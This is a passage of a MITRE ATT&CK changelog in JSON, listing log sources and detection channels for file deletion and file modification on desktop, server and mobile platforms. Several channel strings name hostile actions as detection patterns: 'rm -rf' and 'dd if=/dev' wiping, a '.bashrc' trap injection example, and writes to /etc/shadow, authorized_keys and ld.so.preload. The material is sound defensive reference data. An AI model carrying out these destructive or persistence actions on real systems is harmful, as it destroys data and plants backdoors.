\"root['x_mitre_log_sources'][102]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\\\\\.(db|sqlite|txt|log)\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container\"}, \"root['x_mitre_log_sources'][104]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\\\\\.(db|sqlite|json|txt)\"}, \"root['x_mitre_log_sources'][105]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container\"}, \"root['x_mitre_log_sources'][106]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\\\\\.(json|txt|db)\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\\\\\.(json|plist|db)\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\\\\\.(json|txt|db|plist)\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of /Library/Caches/security_inventory.*\\\\\\\\.(json|plist|db)\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content\"}, \"root['x_mitre_log_sources'][111]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection\"}, \"root['x_mitre_log_sources'][112]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"large file write originating from /mnt/usb or external mounted storage\"}, \"root['x_mitre_log_sources'][113]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer\"}, \"root['x_mitre_log_sources'][114]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow\"}, \"root['x_mitre_log_sources'][115]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class\"}, \"root['x_mitre_log_sources'][116]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity\"}, \"root['x_mitre_log_sources'][117]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission\"}, \"root['x_mitre_log_sources'][118]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission\"}, \"root['x_mitre_log_sources'][119]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission\"}, \"root['x_mitre_log_sources'][120]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity\"}, \"root['x_mitre_log_sources'][121]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity\"}, \"root['x_mitre_log_sources'][122]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication\"}, \"root['x_mitre_log_sources'][123]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase\"}, \"root['x_mitre_log_sources'][124]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer\"}, \"root['x_mitre_log_sources'][125]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect\"}, \"root['x_mitre_log_sources'][126]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement\"}, \"root['x_mitre_log_sources'][127]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:19:16.114000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0040",
                            "external_id": "DC0040"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Deletion",
                    "description": "Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink/unlinkat on service binaries or data targets"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file deletion"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell history"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=23"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "delete action"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, unlinkat, openat, write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec rm -rf|dd if=/dev|srm|file unlink"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, unlinkat, rmdir"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, rename, open"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=23"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "unlink, fs_delete"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "container file operations"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "rm, clearlogs, logrotate"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Datastore file operations"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE, DELETE, WRITE: Stored data manipulation attempts by unauthorized processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink/unlinkat"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Backup",
                            "channel": "Windows Backup Catalog deletion or catalog corruption"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "/etc/fstab, /etc/systemd/*"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:19:16.114000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][22]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer\"}, \"root['x_mitre_log_sources'][23]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime\"}, \"root['x_mitre_log_sources'][24]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-16 16:41:53.549000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0061",
                            "external_id": "DC0061"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Modification",
                    "description": "Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples: \n\n- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\\Windows\\System32\\drivers\\etc\\hosts` on Windows.\n- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.\n- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.\n- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.\n- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write calls modifying ~/.bashrc, ~/.profile, or /etc/paths.d"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File modification in /etc/paths.d or user shell rc files"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/quarantine.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of ~/Library/LaunchAgents or /Library/LaunchDaemons plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "AUDIT_SYSCALL (open, write, rename, unlink)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_WRITE, targeting .zshrc, .zlogin, .zprofile"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/install.log"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=2"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call for modification of /etc/sudoers or writing to /var/db/sudo"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: File modifications under /etc/ssl/certs, /usr/local/share/ca-certificates, or /etc/pki/ca-trust/source/anchors"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: Enumeration of root certificates showing unexpected additions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, unlink, rename: Suspicious file access, deletion, or modification of sensitive paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Anomalous plist modifications or sensitive file overwrites by non-standard processes"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Modification or deletion of /etc/audit/audit.rules or /etc/audit/audit.conf"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write of .service unit files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write/unlink"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loginwindow or desktopservices modified settings or files"
                        },
                        {
                            "name": "ESXiLogs:messages",
                            "channel": "changes to /etc/motd or /etc/vmware/welcome"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write, rename"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "file change monitoring within /etc/cron.*, /tmp, or mounted volumes"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "manual edits to /etc/rc.local.d/local.sh or cron.d"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "/etc/passwd or /etc/group file write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "SecurityAgentPlugins modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write: File modifications to *.plist within LaunchAgents, LaunchDaemons, Application Support, or Preferences directories"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "boot"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of backgrounditems.btm or creation of LoginItems subdirectory in .app bundle"
                        },
                        {
                            "name": "fs:filesystem",
                            "channel": "Modification or creation of files matching 'com.apple.loginwindow.*.plist' in ~/Library/Preferences/ByHost"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write | PATH=/home/*/.ssh/authorized_keys"
                        },
                        {
                            "name": "macos:auth",
                            "channel": "~/.ssh/authorized_keys"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "compute.instances.setMetadata"
                        },
                        {
                            "name": "azure:resource",
                            "channel": "PATCH vm/authorized_keys"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "file write or edit"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "rename"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "file_write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of plist with apple.awt.UIElement set to TRUE"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "unlink, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: Write operations targeting /dev/sda, /dev/nvme0n1, or EFI partition mounts"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write: Modification of /boot/grub/*, /boot/efi/EFI/*, or initramfs images"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "config-change: timezone or ntp server configuration change after a time query command"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "replace existing dylibs"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes to boot variables, startup image paths, or checksum verification failures"
                        },
                        {
                            "name": "firmware:update",
                            "channel": "Unexpected or unscheduled firmware updates, image overwrites, or failed signature validation"
                        },
                        {
                            "name": "IntegrityCheck:ImageValidation",
                            "channel": "Checksum or hash mismatch between running image and known-good vendor-provided image"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "File modifications in ~/Library/Preferences/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write to /etc/pam.d/*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /Library/Security/SecurityAgentPlugins"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modifications to Mail.app plist files controlling message rules"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write: Modification of structured stored data by suspicious processes"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unexpected log entries or malformed SQL operations in databases"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected creation or modification of stored data files in protected directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat, write, rename, unlink"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file encrypted|new file with .encrypted extension|disk write burst"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "rename .vmdk to .*.locked|datastore write spike"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mach-O binary modified or LC_LOAD_DYLIB segment inserted"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write syscalls targeting /etc/ld.so.preload or binaries in /usr/bin"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modified application plist or binary replacement in /Applications"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "admin command usage"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "startup-config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation or overwrite in common web-hosting folders"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Unauthorized file modifications within datastore volumes via shell access or vCLI"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing 'crypto', 'key length', 'cipher', or downgrade of encryption settings"
                        },
                        {
                            "name": "FirmwareLogs:Update",
                            "channel": "Unexpected firmware or image updates modifying cryptographic modules"
                        },
                        {
                            "name": "fs:plist",
                            "channel": "/var/root/Library/Preferences/com.apple.loginwindow.plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "modification of existing .service file"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write or create events on *.pth, sitecustomize.py, usercustomize.py in site-packages or dist-packages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write of plist files in /Library/LaunchAgents or /Library/LaunchDaemons"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Unexpected modification to lsass.exe or cryptdll.dll"
                        },
                        {
                            "name": "networkconfig",
                            "channel": "unexpected OS image file upload or modification events"
                        },
                        {
                            "name": "network:runtime",
                            "channel": "checksum or runtime memory verification failures"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: Modification of /boot/grub/* or /boot/efi/*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /System/Library/CoreServices/boot.efi"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of LaunchAgents or LaunchDaemons plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "rename,chmod"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "create/write/rename under user-writable paths"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Changes to LSFileQuarantineEnabled field in Info.plist"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file access to /usr/lib/cron/tabs/ and cron output files"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "modification of crontab or local.sh entries"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration file modified or replaced on network device"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Plist modifications containing virtualization run configurations"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file access to /usr/lib/cron/at and job execution path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "binary modified or replaced"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "binary or module replacement event"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration change events referencing encryption, TLS/SSL, or IPSec settings"
                        },
                        {
                            "name": "networkdevice:firmware",
                            "channel": "Unexpected firmware update or image modification affecting crypto modules"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating permission, ownership, or extended attribute changes on critical paths. File system modification events with kFSEventStreamEventFlagItemChangeOwner, kFSEventStreamEventFlagItemXattrMod flags"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Modification of Display Manager configuration files (/etc/gdm3/*, /etc/lightdm/*)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /Library/Preferences/com.apple.loginwindow plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Modification of user shell profile or trap registration via echo/redirection (e.g., echo \"trap 'malicious_cmd' INT\" >> ~/.bashrc)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File write or append to .zshrc, .bash_profile, .zprofile, etc."
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, write, create, open"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Extensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: File writes to application binaries or libraries at runtime"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CALCULATE: Mismatch in file integrity of critical macOS applications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file write operations in /Library/WebServer/Documents"
                        },
                        {
                            "name": "fs:launchdaemons",
                            "channel": "file_modify"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write: File modifications to /etc/systemd/sleep.conf or related power configuration files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write: File modification to com.apple.PowerManagement.plist or related system preference files"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "modification of existing LaunchAgents plist"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create/modify dylib in monitored directories"
                        },
                        {
                            "name": "WinEventLog:CodeIntegrity",
                            "channel": "EventCode=3033"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write operation on /etc/passwd or /etc/shadow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "modification to /var/db/dslocal/nodes/Default/users/"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "New or modified kernel object files (.ko) within /lib/modules directory"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Modifications to /var/db/SystemPolicyConfiguration/KextPolicy or kext_policy table"
                        },
                        {
                            "name": "networkdevice:audit",
                            "channel": "SNMP configuration changes, such as enabling read/write access or modifying community strings"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mount or losetup commands creating hidden or encrypted FS"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Hidden volume attachment or modification events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious plist edits for volume mounting behavior"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes to startup image paths, boot loader parameters, or debug flags"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Checksum/hash mismatch between device OS image and baseline known-good version"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file writes"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "OfficeTelemetry or DLP"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Filesystem Access Logging"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing cryptographic hardware modules or disabling hardware acceleration"
                        },
                        {
                            "name": "FirmwareLogs:Update",
                            "channel": "Unexpected firmware updates that alter encryption libraries or disable hardware crypto modules"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Anomalous editing of invoice or payment document templates"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "truncate, unlink, write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification or replacement of /Library/Application Support/com.apple.TCC/TCC.db or ~/Library/Application Support/com.apple.TCC/TCC.db"
                        },
                        {
                            "name": "linux:fim",
                            "channel": "Changes to /etc/rc.local.d/local.sh or creation of unexpected startup files in persistent partitions (/etc/init.d, /store, /locker)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "write, rename"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write to /proc/*/mem or /proc/*/maps"
                        },
                        {
                            "name": "sysdig:file",
                            "channel": "evt.type=write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "rule definitions written to emond rule plists"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing older image versions or unexpected boot parameters"
                        },
                        {
                            "name": "FileIntegrity:ImageValidation",
                            "channel": "Hash/checksum mismatch against baseline vendor-provided OS image versions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write or rename to /etc/systemd/system or /etc/init.d"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file write to launchd plist paths"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "modification of entrypoint scripts or init containers"
                        },
                        {
                            "name": "fs:plist_monitoring",
                            "channel": "/Users/*/Library/Mail/V*/MailData/RulesActiveState.plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod/chown to /etc/passwd or /etc/shadow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write syscalls targeting web directory files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Terminal/Editor processes modifying web folder"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "AndroidLogs:FileSystem",
                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 16:41:53.549000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][144]\": {\"name\": \"AndroidLogs:FileSystem\", \"channel\": \"Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts\"}, \"root['x_mitre_log_sources'][145]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents\"}, \"root['x_mitre_log_sources'][146]\": {\"name\": \"android:logcat\", \"channel\": \"INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change\"}, \"root['x_mitre_log_sources'][147]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event\"}, \"root['x_mitre_log_sources'][148]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history\"}, \"root['x_mitre_log_sources'][149]\": {\"name\": \"auditd:PATH\", \"channel\": \"odification of ~/.ssh/authorized_keys or credential files\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-01-29 17:21:27.873000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0016",
                            "external_id": "DC0016"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
